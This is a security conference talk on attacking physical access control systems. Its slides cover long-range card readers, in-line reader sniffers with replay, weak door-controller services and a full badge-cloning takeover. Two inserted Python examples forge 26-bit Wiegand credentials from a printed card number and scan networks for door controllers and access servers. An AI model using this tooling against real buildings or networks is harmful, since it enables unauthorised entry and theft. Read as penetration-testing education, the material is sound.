All Your Door Belong To Me – Attacking Physical Access Systems
VALERIE THOMAS
EXECUTIVE SECURITY CONSULTANT
@HACKTRESS09
Introduction
• Executive Security Consultant for Securicon
• 10+ years in Information Security
• Coauthor of Building A Security Awareness Program
• Social Engineering trainer
• Physical access “enthusiast”
Agenda
• Why this talk?
• Topology of a physical access system (PACS)
• Why PACS deployments are insecure
• Attack surfaces and exploits
• Putting it all together for complete takeover
What Is A Physical Access System?
A physical access control system (PACS) consists of several components working together to ensure that access to a controlled area is granted or denied when appropriate.
Why Physical Access Systems?
PACS Components
• Access control point
• Door
• Gate
• Turnstile
• Credential Reader
• Credential
• Access card
• Electronic fob
• Personal identification number (PIN)
• Biometric
Access Cards
Low frequency
• 125 kHz
• Small amount of data
• Unencrypted: the card ID is sent in the clear, so anything that can read it can replay it
High frequency
• 13.56 MHz
• Large amount of data
• Sometimes encrypted
PACS components
• Access control panel
  • Decodes the binary data sent by the reader
  • Compares card data to an access list, then grants or denies entry
• Access control server
  • Software provided by the manufacturer
  • Usually a Windows server
  • Maintains card records
  • Maintains access groups
  • Card format details
  • Event monitoring
• Door components
  • Electric strike
  • Door contact
  • Request to exit (RTE)
How credentials are read
https://media.blackhat.com/us-13/US-13-Brown-RFID-Hacking-Live-Free-or-RFID-Hard-Slides.pdf
https://en.wikipedia.org/?title=Access_control#/media/File:Access_control_door_wiring.png
https://en.wikipedia.org/?title=Access_control#/media/File:Access_control_topologies_main_controller_a.png
The Split Personality of Security
Computer Security
• Protects valuable assets
• Typically reports to Technology or Financial Officers
• “You must be really smart”
• Controls designed and implemented by network security professionals
Physical Security
• Protects valuable assets
• Typically reports to Administration or Facilities Organization
• “You’ll get a better job someday”
• Controls designed and implemented by electrical contractors
Why PACS deployments are insecure
• The gap between physical and cyber security is closing
• The physical security industry is ~15 years behind IT
• No security maturity model
• Vendors implement features without security testing
• Heavily reliant on IT, but with little understanding of it
• Often deployed and forgotten
HID iClass
• The card and reader perform mutual authentication using a 64-bit key
• This key is programmed into the reader at the factory
• Standard Security uses one global key shared by every reader, so once that key was recovered from reader firmware (published in 2010) the encryption stopped protecting any Standard Security deployment
• Don’t worry - It’s encrypted!
https://www.blackhat.com/docs/us-15/materials/us-15-Evenchick-Breaking-Access-Controls-With-BLEKey-wp.pdf
Physical security culture
• Majority are former military/defense
• Lack technical understanding of PACS
• Unaccustomed to patching/addressing
vulnerabilities
• Vendor loyal
• Resistant to change
Attack surfaces and exploits
• Access cards
• Readers
• Request to exit devices
• Access control panel
• Access control server
• Workstations
Access card attacks
Access card attacks - Long Range
• Weaponized long range reader (read & record)
• Does not clone/write
• Read distance is ~2 ft
• Available for
  • Proximity
  • iClass (Standard Security)
  • Indala
PROS
• Improved read range
• Stores hundreds of card reads
• No interaction required – just power on
CONS
• Expensive =(
• Can misread custom card formats
Design 1 – Tastic RFID Thief
Tastic RFID Thief Output File
Tastic RFID Thief
Parts list and design details:
http://www.bishopfox.com/resources/tools/rfid-hacking/attack-tools/
Design 2 - RavenHID
RavenHID
• BLE Mini Add-on (http://redbearlab.com)
• Parts list and design details
https://github.com/emperorcow/ravenhid
Long Range Power
• The power source must supply a 12 V output
Access card attacks – low tech
Most vendors print the card number ON THE CARD
Access card attacks – low tech
And on the box
Reader attacks - BLEKey
• Wired in-line between the reader and the panel, on the reader’s Wiegand data lines
• Records card data and sends it over Bluetooth Low Energy
• Replays recorded card data to the panel
• Reader DoS
Reader attacks - BLEKey
Black Hat presentation
https://www.blackhat.com/docs/us-15/materials/us-15-Evenchick-Breaking-Access-Controls-With-BLEKey.pdf
Parts list and software
https://github.com/linklayer/BLEKey
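The panel’s “decodes binary data, compares to an access list” step, the long-range reader’s output file, the card number printed on the card and BLEKey’s replay all rest on one fact: in a standard 125 kHz prox deployment the credential is a short, unauthenticated bit string, the same on the air as on the reader-to-panel Wiegand wiring. The following is an added example, not code from the talk or from any vendor. It implements the public 26-bit H10301 layout (bit 0 even parity over bits 1-12, bits 1-8 facility code, bits 9-24 card number, bit 25 odd parity over bits 13-24) and chains two of the slides’ attacks: one long-range capture gives the site’s facility code, and a number read off a badge gives the rest. Facility code 122, card numbers 12345/12346, the access list and the helper names are constructed for illustration.

```python
"""
Decode, validate and re-encode 26-bit Wiegand card data (the HID H10301
format) and make the grant/deny decision a door controller makes.

Added example, not code from the talk or from any vendor.  The H10301
layout is public: bit 0 is even parity over bits 1-12, bits 1-8 are the
facility code, bits 9-24 the card number, bit 25 is odd parity over
bits 13-24.  The facility code, card numbers and access list below are
constructed.
"""


def decode_h10301(bits: str) -> tuple:
    """Return (facility_code, card_number) from a 26-character '0'/'1' string.

    Raises ValueError on a bad length or a parity failure, which is how a
    panel (or a long-range reader's firmware) discards a misread.
    """
    if len(bits) != 26 or set(bits) - {"0", "1"}:
        raise ValueError("expected 26 bits of '0'/'1'")
    b = [int(c) for c in bits]
    if sum(b[0:13]) % 2 != 0:          # leading bit + data bits 1-12 must be even
        raise ValueError("even parity check failed")
    if sum(b[13:26]) % 2 != 1:         # data bits 13-24 + trailing bit must be odd
        raise ValueError("odd parity check failed")
    return int(bits[1:9], 2), int(bits[9:25], 2)


def encode_h10301(facility: int, card: int) -> str:
    """Build the 26 bits a reader emits for this facility code / card number.

    This is all a cloner needs: the number printed on the card plus the
    facility code, which is typically shared by every card at a site.
    """
    if not 0 <= facility < 256 or not 0 <= card < 65536:
        raise ValueError("facility code is 8 bits, card number is 16 bits")
    data = f"{facility:08b}{card:016b}"          # 24 data bits
    even = str(data[:12].count("1") % 2)          # bit 0: make bits 0-12 sum even
    odd = str((data[12:].count("1") + 1) % 2)     # bit 25: make bits 13-25 sum odd
    return even + data + odd


def panel_decision(bits: str, access_list: dict, door: str) -> bool:
    """What the access control panel does: decode the bit string, look the
    credential up, and grant only if its access group includes this door.
    Nothing here authenticates the card; valid bits from any source win."""
    try:
        credential = decode_h10301(bits)
    except ValueError:
        return False                          # misread or tampered: deny
    return door in access_list.get(credential, set())


# Constructed access list: (facility code, card number) -> doors allowed.
ACCESS_LIST = {
    (122, 12345): {"lobby", "server-room"},
    (122, 12346): {"lobby"},
}


def clone_from_printed_number(captured_bits: str, printed_number: int) -> str:
    """Low-tech attack from the slides: the facility code is recovered from
    one long-range capture at the site, the card number is read off the
    target's badge, and the two re-encode to a valid credential."""
    facility, _ = decode_h10301(captured_bits)
    return encode_h10301(facility, printed_number)


if __name__ == "__main__":
    # A constructed long-range capture of card 12346 (lobby only).
    captured = encode_h10301(122, 12346)
    print("captured", captured, "->", decode_h10301(captured))
    # The badge of a server-room holder shows "12345"; no capture of it is needed.
    forged = clone_from_printed_number(captured, 12345)
    print("forged  ", forged, "server-room:", panel_decision(forged, ACCESS_LIST, "server-room"))
    # A single flipped bit fails parity and is dropped by the panel.
    flipped = forged[:5] + ("1" if forged[5] == "0" else "0") + forged[6:]
    print("flipped ", flipped, "server-room:", panel_decision(flipped, ACCESS_LIST, "server-room"))
```

Run it to see the captured credential decode, the forged one pass the panel check for the server room, and a single flipped bit get rejected. Parity is an integrity check against misreads, not an authentication mechanism, which is the whole problem with this card format.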
Request to exit device attacks
Access control panel attacks
• Remember how important door controllers are?
• Medium to large environments will have multiple door controllers
• These controllers are usually reachable from the general address pool rather than a segregated network
• Often hold very useful data
Hunting Door Controllers
• Many controllers have features to simplify
configuration
• Embedded web servers
• FTP
• SNMP
• Access is generally open or protected with a weak
default password
• Many allow anonymous FTP
Hunting Door Controllers
Keep in mind…
• These devices can be very fragile – heavy scanning
is not recommended
• Many of the web interfaces will only work in IE
• Don’t change any settings
Hunting Door Controllers
Ports to look for
• TCP 21
• TCP 23
• TCP 80
• UDP 161
• TCP 9999
Keywords in DNS/Nessus scans
• Tyco
• iStar
• Matrix
• Lenel
What Can Controllers Tell Us?
• Card numbers and access log
• Areas they control
• IPs of other controllers
• IPs of the access server
• Passwords!
Web Interface
VertX
https://github.com/brad-anton/VertX
Hunting Access Servers
• Usually not as obvious as controllers
• Majority are Windows servers
• Can often obtain the IP from a controller
• DNS search is a fairly reliable method
Hunting Access Servers
DNS/Nessus Keywords
• CCURE/C-CURE/C*CURE
• OnGuard
• AccessControl
• FacilityCommander
• Additional keywords at http://www.capterra.com/physical-security-software/
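To turn the two hunting slides (door controllers: TCP 21/23/80/9999 and UDP 161, keywords Tyco/iStar/Matrix/Lenel; access servers: CCURE, OnGuard, AccessControl, FacilityCommander) into something repeatable, here is an added example, not code from the talk or from any vendor tool. It classifies hostnames by the slide keywords, parses nmap grepable (-oG) output, flags hosts by name or by a controller-like port set, and probes a candidate one port at a time, respecting the warning that these devices are fragile. The hostnames, addresses and scan lines are constructed, and the “three or more matching ports” threshold is this example’s own heuristic.

```python
"""
Find likely door controllers and access servers in DNS names and in
nmap grepable (-oG) output, then probe a candidate one port at a time.

Added example, not code from the talk or any vendor tool.  The keyword
lists and port list come from the slides; the hostnames, addresses and
scan lines below are constructed, and the "three or more matching
ports" threshold is this example's own heuristic.
"""
import re
import socket
import time

CONTROLLER_KEYWORDS = ("tyco", "istar", "matrix", "lenel")
SERVER_KEYWORDS = ("ccure", "c-cure", "c*cure", "onguard",
                   "accesscontrol", "facilitycommander")
CONTROLLER_TCP_PORTS = frozenset({21, 23, 80, 9999})
CONTROLLER_UDP_PORTS = frozenset({161})

# Constructed nmap -oG output: one controller, one server, one printer.
SAMPLE_NMAP = """\
# Nmap grepable output (constructed sample)
Host: 10.0.5.21 (istar-b2-door3.corp.example)\tStatus: Up
Host: 10.0.5.21 (istar-b2-door3.corp.example)\tPorts: 21/open/tcp//ftp///, 23/open/tcp//telnet///, 80/open/tcp//http///, 9999/open/tcp//abyss///\tIgnored State: closed (996)
Host: 10.0.5.40 (ccure-app01.corp.example)\tPorts: 80/open/tcp//http///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///
Host: 10.0.5.77 (printer-3f.corp.example)\tPorts: 80/open/tcp//http///, 161/open|filtered/udp//snmp///, 9100/open/tcp//jetdirect///
"""


def _squash(text: str) -> str:
    """Lower-case and drop punctuation so 'C-CURE', 'C*CURE' and 'ccure' compare equal."""
    return re.sub(r"[^a-z0-9]", "", text.lower())


def classify_hostname(name: str):
    """Return 'server', 'controller' or None based on the slide keywords.

    Server keywords are checked first because a host such as
    'lenel-onguard-01' is the OnGuard server, not a Lenel controller.
    """
    squashed = _squash(name)
    if any(_squash(k) in squashed for k in SERVER_KEYWORDS):
        return "server"
    if any(_squash(k) in squashed for k in CONTROLLER_KEYWORDS):
        return "controller"
    return None


def parse_nmap_grepable(text: str) -> dict:
    """Map IP -> {'name', 'tcp', 'udp'} from -oG lines, merging the
    'Status' and 'Ports' lines nmap emits for the same host."""
    hosts = {}
    for line in text.splitlines():
        m = re.match(r"Host:\s+(\S+)\s+\(([^)]*)\)", line)
        if not m:
            continue
        ip, name = m.group(1), m.group(2)
        entry = hosts.setdefault(ip, {"name": name, "tcp": set(), "udp": set()})
        # open|filtered is what nmap reports for unanswered UDP probes such as SNMP.
        for port, _state, proto in re.findall(r"(\d+)/(open(?:\|filtered)?)/(tcp|udp)", line):
            entry[proto].add(int(port))
    return hosts


def port_score(tcp_open: set, udp_open: set) -> int:
    """How many of the slide's controller ports this host exposes."""
    return len(tcp_open & CONTROLLER_TCP_PORTS) + len(udp_open & CONTROLLER_UDP_PORTS)


def triage(nmap_text: str) -> dict:
    """Return IP -> list of reasons for every host worth a closer look."""
    hits = {}
    for ip, h in parse_nmap_grepable(nmap_text).items():
        reasons = []
        kind = classify_hostname(h["name"])
        if kind:
            reasons.append(f"hostname suggests access {kind}")
        if port_score(h["tcp"], h["udp"]) >= 3:   # heuristic threshold
            reasons.append("exposes a controller-like port set")
        if reasons:
            hits[ip] = reasons
    return hits


def probe_serial(host: str, ports=sorted(CONTROLLER_TCP_PORTS), delay_s=1.0, timeout_s=2.0) -> list:
    """One TCP connect at a time with a pause in between.  The slides warn
    that controllers are fragile, so never fire a parallel scan at a
    suspected PACS device: connect, record, disconnect, wait."""
    found = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout_s)
            if s.connect_ex((host, port)) == 0:
                found.append(port)
        time.sleep(delay_s)
    return found


if __name__ == "__main__":
    for ip, reasons in triage(SAMPLE_NMAP).items():
        print(ip, "->", "; ".join(reasons))
```

The printer in the sample shows why the port heuristic needs a threshold: HTTP plus SNMP alone describes half the devices on a corporate network. probe_serial makes real connections and is not exercised by the sample; use it only against hosts you are authorised to test, and keep it read-only, since the slides say not to change any settings.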
Other PACS Resources
PACS information and card data can be found in other areas of the network
• SharePoint
• Email
• Document shares (often readable over a null session)
• Guard workstations
Putting it all together
• Long range reader to collect card data
• Programmed duplicate cards and created a fake employee card
• Observed security guard daily activity
• Placed hardware keyloggers
• Captured credentials and other useful data
• Gained access to the access server
• Produced duplicate cards for employees with the most access
Game Over
Long road ahead
• Physical security has a lot of catching up to do
• Will require huge culture shift
• Many of the misconfigurations discussed are
preventable
• PACS security checklist (in progress)
Valerie.Thomas@securicon.com
@hacktress09

Speaker notes

1. How to get card data at longer range (rather than “bumping” or gaining physical access to the card itself).